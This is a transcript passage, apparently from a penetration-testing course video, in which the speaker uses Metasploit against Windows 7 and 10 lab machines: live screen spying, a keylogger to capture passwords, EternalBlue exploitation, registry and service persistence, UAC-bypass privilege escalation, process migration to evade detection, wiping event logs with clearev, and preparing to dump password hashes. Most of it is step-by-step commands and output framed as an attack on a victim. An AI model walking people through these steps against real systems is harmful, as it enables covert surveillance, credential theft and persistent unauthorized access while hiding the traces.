that why screenshot is important here. The simple thing is assume that the victim visited any kind of website here or something, and here just typing some stuffs there, okay, like just visited something like facebook.com, okay. It will take some time because it's a internal internet explorer. Okay, right. So the thing is you guys can able to spy on that, okay, but the another spy, the cool thing is this one, I like this one, screen share. What will happen means you guys can able to monitor the whole screen there, okay. See what will happen, you guys can able to monitor the whole screen. Assume that let me open the uh, WhatsApp or something like that and let me chat there. You guys can easily monitor this all stuffs here, okay. Now let me type here something like uh, hi, okay. Let me open the recycle bin here. See here you guys can able to see the all stuffs here, right? It's a live monitoring, okay. Let's go back. Let me close this. Okay, this is how the things are working. Screenshot, and there is another thing which is a keylogger, okay. To use a keylogger, simple just type here key scan start, okay. Simple just paste it here, key scan start, and the keylogger has been started. Let me type something here, ipconfig, and let me visit some, the internet is not working here, okay. Okay, simple thing is you guys can able to see the things there, okay, what he's typing. Assume that he just visited any company portal and he's just typing his password, username and the password. Simple, you guys can able to grab that, okay. And to dump that, simple, first of all you just after starting the keylogger, simple, you just need to copy this key scan and just paste it here, key scan underscore dump. Here you guys can able to see the username and the password, the things, okay. Just let me see it here. Let me type something like this, okay. Let's go back here. Okay, maybe it's not working. I don't know why, but whenever I just try, it will work, okay. Let me stop this one. Let me do it again. Let me stop. Let me dump this. Let me start. Sorry. The hell, man. Let, let me start it. Let's go back here. Just type something. Let's go back and let me dump these things. Okay, I can't able to see. I don't know why, but in Windows 10 it will work, but in I don't know why, but in Windows 7 it's not working. Enum desktop is there, and there is a, see here is a p grip is there. This is a very important thing because sometimes I need to grab the location, okay, like that's desktop location. At that time just type the p grip there, okay, and just type the desktop. Let me show you. Just paste it here p grip and let me type here desktop. Like let me show you. Just type here ps first, okay, and there are the hosts are running, okay. Now the thing is, let me find that this one p grip is, it's same like a grip, okay. Which one? Explorer, okay. So here you guys can able to see the id. Now what is this basically, id and this architecture and session user. Now assume that, see, by using this there is a one excellent command is there, which is, where it is, there is a migrate is there, okay. Migrate is a nothing but you guys can able to assume that your payload is 32-bit, okay. You guys can also migrate to 64-bit by choosing any of this architecture. Assume that let me show you practically. Okay, now first of all just type here get UID. Okay, and just see the server username is what, anti authority / system is here. Where is the anti authority here? This is the anti authority. Right now I am in this group. Okay, now let me change it to this one, anti authority local services. Okay, let me change to this one. At that time I'm gonna migrate it. Okay, just simple, just type here migrate and see the exe files which are in that group. Okay, what I said, let me migrate to local services. Okay, let me migrate to which one, this one, SV host. And just remember, you just need to select the ID here. Okay, what is ID here? 1028. Okay, just see PID. Just let me copy it and simple, let me paste the ID number there. See, I'm migrating to 992. Okay, failed, access denied. Let me migrate to this one, welcome. Okay, let me migrate to where, explorer.exe, and here 180.8. Okay, just let me paste it here. Okay, migration completed successfully. And here the thing is, if I type here get UID here you guys can able to see right now my server username is what, Windows desktop welcome. Okay, this is how the things are working here. Okay, if I type here dir, here you guys can able to see the DLL files and exe files, each and everything. Okay, assume that if you want to download something here, simple, you guys can also download this. Okay, there is a wusa.exe is there. Simple, just let me copy it and just type here download. And simple, let me paste the name there. You guys can able to download the stuffs. Okay, just if I open this one, see there is a wusa.exe. This is how you guys can able to download the files. If you want to upload something, simple, just type here upload. Okay, and simple, just paste the location, any file there. Okay, just drag and drop there. Simple, just type enter, it will upload there. Okay, okay, in this class let's learn about persistence. We are setting the persistence in Windows 7. Okay, now how we can able to perform this, and let me tell you what is persistence and why it is important. Okay, well, let me explain you here. See, let me tell you, first of all, this one, we exploited this system by using what, the vulnerability. Okay, the eternal blue vulnerability. We doesn't send it any kind of payload here, the victim doesn't execute anything. Okay, simple, what we did, we just attacked the system through vulnerability. Okay, because in this system the vulnerability is there, so that's why we can able to attack that one by using this exploit. But assume that what will happen if this guy, the employee or this user, patched this vulnerability. Okay, at that time we lose our victim. Okay, this is the thing. Basically, let me explain you in the easy way what is persistence here. See, after some days, okay, I just hacked this system. This is my target system. I just hacked this system. Okay, and I just downloaded some personal data and I am spying on him. Okay, through which after exploiting the system through vulnerability. Okay, which is eternal blue vulnerability or any other vulnerability. Okay, I just exploited this system and I'm hacking. I just hacked it and I'm performing the spying there. I'm sorry guys. Okay, I just downloaded the private documents, each and everything. But after some time, what happened means the user know that my system is vulnerable. Okay, my system is vulnerable. At that time, what he do? Simple, he will update his system or he will patch that vulnerability. Okay, he will update or he will patch that vulnerability. Okay, after patching it, what will happen means we can't able to communicate with our system, with our target system, because the vulnerability has been patched. Okay, this thing has been patched here. After patching this vulnerability, we can't able to connect with it. So at that time, in the red teaming, in penetration testing, mostly in red teaming, what we do means we perform the persistence here. After assume that this guy successfully patched the vulnerability. Still, I can able to communicate with this my target IP, my target system through this persistence. Okay, this is the thing. And the second thing is in hacking field about persistence is a nothing but see, I just hacked this guy system. Okay, this let me this one. Okay, I just hacked this system. Okay, after hacking the system, I can able to communicate with him. Okay, now assume that this guy has been restarted his computer. Okay, restarted his computer. At that time, what will happen? I can able to lose the connection. Okay, yes, let me show you practically. See, right now I just hacked this system. Okay, this one using the vulnerability. Okay, now let me restart it. What will happen? Let me show you. Let's go back here. See, right now I can able to interact with my target system. See, here is a Meterpreter session is there. Now let me show you what will happen. It will take some time. For type, just type here help. See what it's showing, Meterpreter session has been closed because it's restarted. Okay, so that's why I can't able to communicate with him. To communicate with him again, I need to send the payload, or again I need to exploit. I just told you what will happen is if my target patched that vulnerability, then everything will be lost. Okay, at that time you need to set up the persistence. Okay, how to set up? Now simple thing is just go back in the Metasploit only. Just go back and search for, just type here search persistence. Okay, now here you guys can able to see the exploits for this one. Okay, now the basic exploit is you can also use this one. This is for Linux. Okay, let me tell you, this OS X. Okay, it's for Mac. You just need to only select the Windows because your target is Windows here. Okay, Windows, there is a Windows. Okay, this one is excellent. Windows persistence registry, startup payload installer. See, majority of people use this one. Okay, they just target the payload on Windows persistent registry startup. Okay, they will inject the payload on in the registry. Okay, yes, whenever our target restart our system, then what will happen means we can able to just let me use this one. Okay, it's for the same. Okay, after it's for the vulnerability base as well, it's for the restart base as well. Okay, assume that if the vulnerability patched here as well, I can able to communicate with my target because I am using the persistence here. Okay, now let me show you in the practically. Okay, just type here use, what is the number here, 16, right? Just type here 16. The thing is, sorry, I just forget it. First of all, you need to hack your system. Okay, the session has been closed here, so let me hack it. Okay, again. Okay, search. The hell, man, what happened here? Okay, now it's working. Eternal blue. Now there is, which one I use? Yeah, I use this one. Okay, use 0. Again I am saying, after attacking the system, okay, after hacking the system, you just need to perform this step. Okay, yes, use 0. And what I just set up each and everything here. I just need to set up my target IP only. Okay, just let me exploit it. Now the attack has been started. Now it will take some time. So I successfully hacked my system, my target system. Simple, you just need to type here background or BG. Okay, Now see, it has been background. Now you guys can able to use another module, okay, to see that sessions. Okay, basically the sessions has been background. To see the sessions, simple, just type here sessions. Okay, you guys can able to interact with this one. Okay, after doing the process, see, remember the session ID is very important here. Okay, yes. Now if I want to interact with this session, then what I need to do, just simple, just type here session. Okay, just type here 6, the ID, sorry, sessions 6. Now I can able to interact with this session. Okay, let me do it background again, or you guys can also type BG. Okay, now let me use this module. Okay, this persistence module. See, first again I am saying, first you need to hack the system, then you need to follow the persistence step here. Okay, see, again I am saying, see, I just attacked this system and hacked this stuffs. Okay, see, I got the connection here. Then what I did, I just background the session, then I am using the another this one, the module. Okay, now let me search for persistence. Okay, tense. Okay, now which one I need to use? Let me use this one. Just type here use 16. Okay, all right. Now just type here show options. It's a very basic one. Okay, you guys can also add the name here. Okay, see, the file for the payload to be used on the target host. Okay, you guys can also name it. Just type the set exe underscore name and set up the name, but it's use a random names here. Okay, there is a path is there, path to write the payload. Basically by default this will write on temp folder. Okay, registry name, this is not for this one. Okay, for beginners you no need to worry about this all stuffs. There is a startup user is there. Okay, just see, there is a delay is there. Okay, delay in seconds. After 10 seconds the connection will communicate with you, your target will communicate with you. Okay, now here there is a what payload options. Okay, here there is a what lhost is there and lport is there. Here what you need to set up, the thing you just need to set up is session. Okay, I just told you, you just need to remember the session number there. Okay, session ID, simple. From here also I can able to see the sessions. Okay, you no need to worry. Simple, if I type here sessions, okay, here I can able to see the ID is 6 here. Now simple, just set the session here. Okay, just type here set session, let me paste it, and set the ID here. Okay, the ID is what, 6. The ID has been successfully set up. Now see, basically in the let's go back here. It's using which payload port? It's using the 4444. Okay, see which one, this payload, this thing is using, the payload is using 4444. Okay, our system is using 4444 payload, sorry, the port. Here you just need to change it. Okay, just change this one, because this one and the precisions one can't use the same port. Okay, because every port is single. Okay, it's not like duplicate or something like that. You just need to assume that you just given the previous port is 4444. For this you need to change the port. Okay, just type here set l port, let me change it to 5555. Okay, now simple, exploited. See, failed to make entry in registry for persistence. Okay, why? Not current using the startup user, this may not log in often, maybe a script. Okay, the simple thing is, let me use a different one. Search persistence here, type here back, and let me search for persistence again. Let me use another excellent one. Let me use this one, use 18. Registry persistence is there, right? Use what, 18. Okay, just type here show options. Here what you need to set, the same thing, just type here set session. What session is that? The session number is 6, right? And here there is a sleep time sorry guys, See here there is a yes, just select that one. And here the thing is lhost is my Kali Linux IP, and I just need to change the what L port. Set L port 5555. Let me exploit it. Ensure run key. Exploited about it due to failure unknown, not ensure run key. Okay, just this will happen. Okay, type here sessions again. Okay, the session doesn't it's not created any kind of session here, so let me do it again. Just type here back, search persistence. I just use this one, right? Let me use this one, persistence service, use 17. Just type here show options. Now the same thing you just need to add here, session. Just type here set session to what 6, and let me set the L port to 5555, and also let me check the IP of my Kali machine 183. Right, just simple exploit it. Okay, now it's successfully executed. Okay, now see, let me type here BG for background. Just type the session. See, I got right now I got two sessions. One is 6 and one is 7. Okay, now let me tell you, 7 is a persistence one. Okay, and 6 is not persistence. Okay, yes, this is a previous one. We all know that. Okay, now just type here sessions 7. Okay, I can able to execute this one. I can able to interact with it. Now assume that this guy patched this vulnerability, eternal blue vulnerability. Okay, and still I can able to access the system because I did the precisions here. Okay, I just injected my payload where here you guys can able to see where meterpreter service exe return to where c windows temp crhpf.exe. Okay, and the cleanup meterpreter rc file is here, and there is a sending stage to where my stage to where our target system. Basically what he did, he generated the payload, he added the payload here. Okay, where library sorry guys, computer, there is a user, sorry, yeah, I just told you these things are in hidden, so at that time what you need to do means sorry guys, simple, let me type here show hidden folders is here, hidden files or folders. Here you just need to select the show hidden files folders and drive, select it, apply. Here you guys can able to see just type c and there is a where it's user, there is a default, in default there is a app data where it's saved. Let me see where it is, man, app data, sorry, see windows temp. Okay, sorry for that. See where is the windows, there is a temp is here, here is a temp. See, I can you current you don't have currently have the you don't currently have permissions to access this for simple continue. Here it's generated one payload where it is with the which name. Okay, it generated the payload with crhpf. This is a nothing but this is our payload. Okay, whenever this guy patched this vulnerability or he just restarted, automatically the payload will be executed and we will get the connection here. Okay, let me show you. See, right now I can able to interact with him. Okay, now let me restart this. Sorry, I did shut down there. Let me start it again. Let me type here help. I can able to see this, but I can't able to communicate with him. Okay, if I type here dir, see, I can't able to communicate. See, Meterpreter session closed. 6 has been closed. See, 6 is not persistence. Okay, we just exploited this using what? Using vulnerability. Okay, just let me type here where it is. It's restarted. Just type here. There is a no active sessions out there. Okay, now what you need to do, the simple thing is you just need to go back, or let me type here back here. Okay, now just listen for the connection, which payload is. Yeah, just let me go back here. Just let's go up. Let me see which payload it's used for this. It's used the Windows Meterpreter what reverse TCP, and which port is I just changed the port to 5555. Okay, now what you need to do, now simple, you need to listen for the connection. How? The simple thing is just open, just let me clear this one. Okay, now just type here use exploit /multi /handler. Okay, now just type here set payload and paste that payload here. Okay, and set lhost, and what is my Linux, this one IP, sorry, if config, and this is my IP, and just type here set L port. What is that L port? 5555. Now just tell me, I didn't send it any kind. Right now I am not sending any kind of payload. Basically in the last scenarios, what I did, I just performed the precisions thing there, and it's automatically generated the payload in the Windows system, and it's saved in where temp folder. Okay, simple. Let me exploit it. See, I'm getting the connection here. This is the thing. Assume that if until this guy doesn't know the things, okay, majority of people what they do means this temp folder is in a hidden mode. Okay, a lot of people won't care about this all stuffs. Okay, yes, this is the thing. There is a different advanced techniques out there to do this all stuffs, but for beginners this is a good stuffs. Okay, to understand the things and each and everything. Now this is a thing basically. Okay, assumed again I am saying, if the vulnerability patch or this guy restarted the system or anything happened after month or week or year, until he just didn't deleted the payload, okay, you guys can able to communicate with this guy. Okay, this system, because right now this guy is we just perform the precision stuffs there, right? Okay, now let's learn about privilege escalation as well. Okay, now to we all know that this is a basic thing. If you type here get system, then right now I'm a administrator, I know this all stuffs. Okay, I'm an administrator. Now I need to just assume that I am a normal user at that time. How I can able to perform the privilege escalation, I'm gonna cover that one too. Okay, in the last classes we learn about persistence. Okay, now here let me do one thing. Let me perform the privilege escalation in where in Windows 7. Okay, let me show you. In the last classes, in the first, okay, in the starting I just generated two payloads, right? One is Shika and one is normal payload. What I did means I just let me download this Shika. Okay, it's successfully downloaded. Now let me set for listener. Okay, now use simple, just type here use exploit multi-handler and simple set payload, which we did in the last classes. See, again I am saying I am not exploiting the vulnerability here. Simple, I am just generating the normal payload and I just send it to my target system. From here I am performing the privilege escalation. Okay, because whenever I just perform the eternal blue I just exploited to eternal blue vulnerability, there it's executed as an administrator. Okay, so whenever the payload executed as an administrator, then we no need to perform the privilege escalation, as I told you in the last classes as well. But see, you just binded your payload with any other file. Okay, and you just send it to your victim, then he just double click it. Okay, we got majority of cases we can able to hack the system, but the connection the payload is executed as a normal user, so we can't able to perform the huge processes there. Okay, so that's why I just told you about the privilege escalation, right? Why the privilege escalation is important. Okay, so this is the thing, right? So that's why what I did, basically I just I'm using this payloads. Okay, because this execute as a normal users, so it is easy for me to explain you this all stuffs. Okay, now just type here set L port, sorry, L host to my Kali Linux IP, and let me use L port to what, 4444. Okay, just type here exploit, don't be confused here. Okay, just type exploit here. Let's go back. Here is a Shika, and let me run it as a normal user. Now I got the connection. If I type here get UID, see here I am a normal user. If I type here shell, here you guys can able to see right now I am a normal user. I just type here exit and just type here BG for background. Okay, now simple, we will use one more. See, let me show you sessions one. Just see, if I type here help, there is a one command is there. By using this we can able to perform the privilege escalation. Okay, but majority of cases it doesn't work. Let me show you. See, I just what I did, I just executed this payload as a normal user, right? So just see, it doesn't work right now. See, get system, it doesn't work. Okay, so at that time we use a different modules. Okay, now let me show you how we can able to perform that. Simple, first of all remember one thing, just type BG here, background. Okay, then just go back, clear, to clear this all stuffs, and simple search for suggester. See, suggester is a module which will help you to which will help for scanning purpose. Okay, it will scan the system, our target system, and it will tell it will show some exploits to perform the privilege escalation. Okay, yes, to use this, simple, just type here use the ID, hash ID is what, 0 here, or you guys can also copy the name and paste it here, right? Just type enter. Now simple, just type here show options. Okay, here you guys can able to see session. You just need to set the session only. Okay, first of all let me see the session ID here. Here the session ID is 1. Okay, now let me set the session here. Just type here set session, and what is the ID? ID is what, 1. Just type enter and exploit it. Now it will scan. Okay, collecting local exploit for x86 Windows. It will take some time. Okay, so you need to wait. It's collecting exploits. It's around 2264 is there. See here, this is the thing we want. Okay, see here what it's showing, the target is not exploitable, and you just need to focus here. Okay, the target appears to be vulnerable. The targets appears to be vulnerable. You just need to target this one. See, basically we need to perform the privilege escalation, right? There are token magic is there. Okay, we no need this all stuffs. Okay, simple. We need to bypass what see, there is a one exploit is there which is very famous to perform the privilege escalation, which is this one. Okay, just let me copy this one, the name of that exploit forward slash what, windows local bypass UAC event viewer. Simple. Just type here back. I just scan that one. Just type here back and just type here use, paste the exploit name now, right now. Okay, and now just type here show options. Here you just need to add what, just see 4444 is here. Here we need to add the session, set session. What is the session? Session is one there, right? Okay, now here our lhost, I just told you, you just need to change the port because the listening port is same. Okay, the 4444, let me change this port. Okay, because the previous listening port is also 4444. Okay, remember one thing, if you are using the same port for 2 times, okay, like the, see, I just generated this payload using the 4444, right? So you won't get the connection if you are using the same port for 2 times. Okay, this is the thing. Just type here lhost, sorry, lport. Just type here 5555 or any port. Okay, just type enter and exploit. Hope it will work. Okay, see, bypass UAC can be bypass the settings. Right, excellent man. So if you type here get UID, here you guys can able to see win welcome is sorry. Just type here back, exit, and just type here sessions. Here I got 2 sessions. Okay, one is what, a normal one. See, Windows welcome at the rate win9f something. Now here there is another one, NT authority forward slash system underscore. I just told you NT authority is nothing but it's a what, it's administrator. Okay, now just type here sessions 2. Okay, right now I am interacting with the session 2. Okay, now just type here sys info. Okay, here there is a logged on user architecture is here. Okay, and just type here get UID. See, right now what I am administrator. Now simple, let me type here shell. See, system 32-bit. This is the thing. Okay, see, you will learn in red teaming training why this privilege escalation is important. Okay, you will be shocked by using if we get the privilege escalation of our target system. Sorry, after performing the privilege escalation in our target system, okay, we can able to perform each and everything. Okay, we can dump anything, we can change the username and the password of our target, we can do a lot of stuffs. Okay, this is the thing, right? So this is how you guys can able to perform the privilege escalation in Windows 7. Now in this class I'm going to teach you how you guys can able to perform the privilege escalation in Windows 10. First of all, you just need to hack your target system. See, I just set up the previous stuffs only, like set payload meterpreter, reverse TCP, lport 4444, lhost IP, and I just click on exploit. Okay, now let me execute this one as a normal user. Okay, just double click it, just click on run. See, I got the connection. Now simple, just type here sys info. Here you guys can able to see it's a Windows 10, and let me type here get UID. Okay, it's a desktop IoT. Okay, and just simple, just type here, let me see shell. Here you guys can able to see it's a normal guy. Okay, Now let me click on exit and me clear this. Sorry, I can't able to clear this. First of all, I need to perform the privilege escalation here. At that time, what I need to do? Simple. First of all, I just need to do the background. Okay, just background this session. Just type BG and enter. Okay. Now let me clear this. Right. Then just simple. Just type back here. Now search for suggester. The same steps you just need to follow for resistance as well. Okay. Just use a different modules here. Okay. Search suggester. Like here is it. Here it is. Sorry. Just type here use 0. And first of all, let me see the session ID here. The hell, man. What happened? The session is closed. Just let me type sessions here. The hell, man. What happened? Step back. And let me set up again. I don't know what happened. Set lhost. Set lport. Exploit. Let me. Okay, it's due to Windows Defender, I think. Okay, yes, it's due to Windows Defender. Okay, let me use Shika instead of normal one. Okay, so here it is. Double click it. Run. Let's go back here. Okay, I got the connection. Right now, simple. Just let me type here get UID. Okay, it's a normal user shell. Okay, just type here back. Sorry, exit. Just type here BG for background. Just type here back. Search for suggester. Okay, use 0, the same thing. Okay, now simple. Just see the BG, the ID is 4. Okay, now just type here show options. Okay, now set session to what? The ID is 4. Just type 4 and exploit. Now it will show the vulnerabilities which are in Windows system. So here is the things. Okay, see, I got this one. Exploit Windows local bypass, the same thing which I got in the last class only. Last class. Okay, like a bypass UAC event viewer, and there is another exploit I got. Bypass UAC FOD helper is there. Okay, where it is? FOD helper is there. Bypass SULI SLUI hijack is there. Okay, it has been vulnerable. Okay, and there is a CV. Just ignore this. Let's focus on this one. Okay, bypass UAC Ford helper is there. Okay, now simple. Just copy this one. Let me use a different module now. Okay, just type here back. The hell, just type here use, paste it, enter. Just type here show options. What is this? You just need to add the session, and you just need to change the L port there. Okay, now just type here set session ID is 4. Sorry guys, set L port. Let me change the L port to 6666. Just let me exploit it. The hell, man, what happened? Exploit. Let me see. UAC bypass, UAC can bypass these settings. Okay, now just type here, sorry, exit. Just type here sessions to see the session. Just see, I got I didn't got any kind of new session here. See, meter session 5 opened. It's saying that but I can't able to see the sessions here. Just type here back. Okay, and let me type here session. Why I can't able to see that? See, it's saying that meter session 5 opened, but whenever when I just type the sessions there, I can't able to see that. See, so no problem, it happens. Okay, so let me use it again. 0. Search. Okay, I think. Okay. Simple. You just need to type exploit here. You no need to set up the L port. I thought that just using for bypass UAC. Okay, so that's why it's given the L port. The simple thing is I am doing the same process again. I can also see that, but still I am doing that. Okay, it's successfully exploited, but still the thing is I can't able to get the session. Okay, the session is also open, but I can't able to see that whenever. So let me use another one. See, we all know that by using this we can able to perform the privilege escalation, but let me use this one as well. Okay, bypass UAC LUI hijack. Let me use that. Okay, now just type here back, use, simple, paste it here. Okay, now here it is. It's excellent. Windows UAC protection bypass. Okay, now just type here use 0. All right, just type here show options. Here the same thing you just need to set up. First of all, let me check for the session ID. The session ID is 4, and here is a set session to 4, and you just need to change what? L port. Okay, set L port, let me set to 7788, and let me also set the target. Okay, set target 0. Okay, now let me exploit it. Okay, now let me type here get UID shell. Okay, I got the, right now I got the what? I can able to perform the privilege escalation here. See, I got the system 32-bit. I think it just continued the shell. Okay, it doesn't created any new session there. See, it's saying that meter session 6 opened, but it's continuing the same session. Okay, like the last same session. So this is the thing. Okay, let me type here exit. Okay, just type here again exit. Let me type here BG. Just type session. See, it's created new session, but I don't know why, but for last it doesn't create it. Okay, now there is a 4 and the new one is 6. Okay, but see, let me go back here. Here just see, it's created the session 5 open, but still I can't able to access that. Whenever I just type the sessions here, I can't able to see that. Maybe I just forget it to do the background, I think. Okay, no problem. See, this is how you guys can able to perform the privilege escalation in Windows 10. Okay, the simple thing, guys, the simple thing is you just need to use the suggester for that. Okay, sometimes suggested won't help you. Okay, at that time you just need to learn more. Okay, which we covered in red teaming training. This all stuffs. Okay, each and everything like AD penetration testing, internal and external pen testing, each and everything. Okay, now this is a thing. Now let's do one thing. Let's perform the persistence as well. Okay, just type here back clear, then just search here. First of all, let me see the sessions. It's closed or not. Okay, okay, I have the sessions here. Now just type here search persistence. Okay, here I got the persistence modules. Simple. The thing is, it's for Linux, is there Unix? The thing is for we need for Windows, right? So let me target for Windows. Let me target the excellent one. This is excellent one. Let me use it's a 2012 auto start is there. I think in the last classes we used this one. Local VSS persistence is there. Let me use this one. Use 7. Show options. Here it is. You don't need to change this all stuffs. There is a R path. R path is there. If you want to change it, change it. Okay. Run key session is there. Let me add the session here. Timeout in 60 seconds. Okay, let me try it. Okay. First of all, let me set session. Let me set session to 6. Okay, the administrator one. Then let me change the L port. I just told you. Set. Okay, let me type it. Okay, set L port to 8888. Just type enter, exploit. And let me see it will work or not. Creating shadow volume copy. Exploit failure. Okay, no problem. It's not working. Let me use another one. Installer. SCXI local VSS server. Okay. SSH key persistence is there. Exploit. This is the only one which is working great. Okay, and this one registry persistence is working great, and exploit Windows local persistence service is working great. Okay, let me use the same thing. I think let me use registry persistence. Just type here use 18. Show options. See why I am doing this all stuff. So I can also select the working one as well. But see, sometimes in your case the things won't work. Okay, so that's why I am using the different exploits. So by watching this, you won't get that much tension about this all stuffs. Okay, because you just need to only add the session ID there. Okay, you will get a complete idea. First, you need to target your system. After targeting the system, you just need to perform the precision. You just need to perform the privilege escalation. Then just perform the persistence. Okay. Now, either you guys can also, after exploiting the system, you guys can also perform the persistence there. Okay. Yes, this is the thing. It's totally depend upon you. But some exploits, okay, some exploits won't work like that. Okay, they need they need privilege escalation for that. To make the payload persistence in the Windows system, they need the privilege escalation. But let me tell you, this module won't need the privilege escalations. Okay, yes, this is the thing, right? Okay, just type here set session. Let me use a non-privilege escalation session, which is 4. Okay, now let me set L port to 8888. Sorry, 388, no problem. Just type here exploit. See, it will work. Simple. What you need to do, just type here exit. You no need to do BG or something like that, because you got the persistence here. Okay, in this class you will learn how you guys can able to clear the locks on your victim system. Basically, whenever we just inject anything, or whenever we just perform privilege escalation persistence, here the thing is, you just need to everything what we are doing will store in our target system. Okay, on our just let me show you practically. So this is a event viewer. If you click on the Windows logs, there is a application is there. Okay, here whenever you perform anything, okay, will store in here. Okay, there is a information is there, there is a path. So the simple thing is, see, you no need to worry here. The simple thing is, after performing the whole attack, you need to clear this locks. Okay, how you guys can able to clear the locks? Okay, simple. See, right now here you guys can able to see the locks, right? Now let me clear this all stuffs. Simple, just type here help. Here there is a clear EV. Simple, just paste it here. See, it's wiped the 38392 records, 3119 records from system, 23295 records from security. If I go back here, just click on the security, there is a nothing. If you click on the application, see, in the last time there is a huge, right? Whenever we see in the previous, we just see this stuff, so it's a huge. Right now it's clear. By using this stuff, this command, we clear this logs. Okay, so this is the thing basically. Okay, see, by using this, user can able to identify that somebody has been hacked his system. Okay, this is the thing. So that's why we are clearing this all logs. Okay, now the main important thing is, in the last classes we just performed the precisions in Windows 10. Okay, the same thing. Okay, it's nothing. The important thing is, I want to say, in this classes we are doing each and everything by using this Metasploit. Okay, you didn't use any script, you didn't modify anything. Okay, it's complete automation stuffs. Okay, so you no need to worry. The same thing which you apply for Windows 10, Windows 7, you applied on Windows 10 as well. Okay, I use a suggester for Windows 7, I use a suggester for Windows 10. Nothing has been changed. Okay, I use the different modules to teach you how you guys can able to set up the options here or something like that. But the thing is, I use the same stuffs. Okay, so in the Windows 7, after doing the persistence, I just exit and I listen for the new connection. At that time, I just change the port. Okay, because whenever in the persistence, I just use the 888, right? After doing the persistence, after doing the successful output, after seeing the a successful output, you just need to listen for the connection on that port, okay, the 888 port. Simple, you guys can able to get the connection, okay. This is the thing. Again, I am saying you no need to worry, the things are same for Windows 10 and Windows 7, okay. You just need to use the suggester. In suggester, you guys can able to see the exploits, okay, which are vulnerable, sorry, your system is vulnerable with, okay. So you can use it and exploit it. Very easy stuffs, okay. But see, let me tell you, in red teaming, the things are completely different, okay. It's a very, it's kind of advanced stuffs, okay. We use the different scripts, each and everything. But this is how you guys, again I am saying, this is how you guys can able to clear the locks. Hello guys, hope you are fine. In this class, I'm gonna explain you about what is this migration, okay. First of all, let me interact with my session, okay. If I type here ps, here you guys can able to see the process, okay. Now let me just type here get uid. See, right now I am a normal user, okay. And also let me type sysinfo. See, here the thing is, see why we perform the migration here, to change the architecture, okay. Assume that our target system is 64-bit, okay. Our payload has been our payload is a 32-bit. See, 86, 30, 32, it's same, okay. If whenever I say 32-bit, then you just need to remember 86-bit, okay. It's a 86-bit. Now just see, assume that I just sended the 32-bit payload to my target system, okay. He just executed it, okay. Even here our target system is 64-bit, okay. Then also see, then also the 64-bit guys can able to execute the 32-bit payloads, okay, the 32-bit applications as well. But 64-bit pay just let me explain you here. There is a 64-bit, 32-bit, okay. Now this is a nothing but this is a architecture. You no need to worry about this all stuffs, okay. Now let me explain you. See, my target system is 64-bit, okay. What I did, I just generated the payload sorry guys, payload of 32-bit and send it to my target system. He just executed it and I got the connection here, okay. I got the connection, got connection. Now sometimes what will happen means some process won't work, okay. Assume that you need to execute some commands here, it won't work, okay. You need to execute some scripts there, okay. It won't work at that time. At that time what we need we do means, see, again I am saying, I just send it the 32-bit to my 64-bit target machine. He can able to execute my 32-bit, okay. This is the thing. Now after executing that, I got the connection, okay. Now sometimes I just told you, sometimes some commands won't work. We need to execute some scripts in real world PT. The thing is nothing but it doesn't work sometimes, okay. Majority of cases it doesn't work. That's the thing, okay. At that time what I need to do means I need to change this 32-bit to 64-bit, okay. 64-bit. Because why? Because my target system is using the 64-bit, so I need to change the 32-bit payload to 64-bit, okay. This is the thing, okay. If my target is having the architecture, my target is using 32-bit architecture, then I no need to change this all stuffs, okay. But sometimes in majority of cases, majority of people or companies or systems are using the 64-bit only, okay. So that's why I need to migrate to 32-bit, okay. The simple thing is what I am doing here is I just changing to 32-bit payload to 64-bit, okay. This is the thing. Let me tell you one notice here. See, assume that your target is 32-bit, okay. then you no need to do this whole process. Okay, this is a thing. And let me tell you, migration, sorry, this migrating, like see, whenever we perform this migration, what will happen means we can able to avoid the detection. Okay, basically hiding the process. Okay, we are hiding the process to gain. Yes, by using the migration, you guys can also perform the persistence as well. Okay, and you guys can avoid the detection. Now let me show you that one. See, right now what is my this one, 86 bit, right? Like 32 bit. So 86, again I am saying 86 is nothing but 32 bit only. Okay, now let me migrate. Just type here migrate. Now here you guys can able to see some x64 bit architectures are there. Okay, now let me migrate to this one, explorer.exe. See, again I am saying it will help you to avoid the detection. Okay, this is a thing. Just let me paste it here. Now just type here get UID. Sorry, see here, sorry man, sysinfo. See, right now our payload architecture is what, x80 64 bit. Okay, and our target sorry guys, our target architecture is also 64 bit and our payload is 64 bit. In this case we can able to execute the scripts and we can able to avoid the detections, persistence, each and everything. Okay, so this is the thing. See, again I am saying majority of target attackers, what they do means they migrate to SVC host. Okay, but here in the process architecture I can't able to see that things. Okay, and also the thing is, okay, it's nothing. You can also migrate to another group as well. Okay, I just in the last classes I just showed the covered that thing. Okay, so this is the thing. Let's dump the hashes. Okay, from our target system. See, in this classes you will see a huge errors. Okay, but I will try to fix it. Okay, you will learn a lot of stuffs here. Basically we are doing here, we are using the features of migrate. Okay, I just told you in the last classes, migrate can do a lot of stuffs. Okay, where you guys can able to change the bit architecture. Okay, and you guys can able to change the groups as well. Okay, and you guys can able to perform the precisions here, and by using the migrate you guys can able to avoid the detections. Okay, this is a thing here. Now the simple thing is, first of all I need to hack the system. The simple, let's go from basic stuffs. Okay, like in the last classes in the beginning, what we did, we just msf console q. So here it is, just type here use exploit / multi handler set payload windows / meter words underscore. See, I'm not passing any kind of stuffs here. Simple, I want to show each and every error and I'm gonna fix it. Okay, now just type here set lhost 192.168.133. Yes, 183. This is my Kali Linux IP. Set lport port to 4444. Okay, and simple exploit. Victim executed the payload here. Okay, I am just executing this as a normal user. If you just see here, get UID. Right now I'm a normal user. If I type here shell, maybe you guys can able to see. Okay, right now here you guys can able to see it's executed as a normal user. Just type here exit, sorry, Why exit is not working? Okay, right. Now simple, just type here again help. In this classes it's about the hash dump, right? Let me type here, let me copy this hash dump and let me paste it here. See, I can't able to dump the hashes, so we need to perform the privilege escalation. Okay, just type here bg for background. Let's perform the privilege escalation here. Remember, you need to first of all, whenever you exit from this interpreter, or if you are performing the privilege escalation, remember you just need to background the session. Okay, yes, or else you can't able to perform the privilege escalation, because first whenever you perform the privilege escalation, the module interact with this session. Okay, uh, then only it will show the output. So this is the thing, don't type the exit or something like that. Okay, now just type here, we all know that we use the suggester. Okay, search suggester. Okay, yes, suggester. Let's see, yes, suggester is there. Just type here use 0 and set, we all know that, set session. What is the session there? First of all, let me check the session ID. The session is 1, ID is 1. Okay, now just type here set session. Sorry, let me type here show options, because you guys can will get some kind of confusion here. And here is a let me set this session. Okay, set session. What is the session number? 1. Just type here exploit. We did this whole process in the last classes. Okay, again I am doing. It will take some time. All right, here is a bypass this one. Just copy it, just go back here, just type here use, let me use this one, and just type here show options, set session to what, I think 1, right? Yes, and you just need to change the L port here, L port to, let me change it to 6666, and then 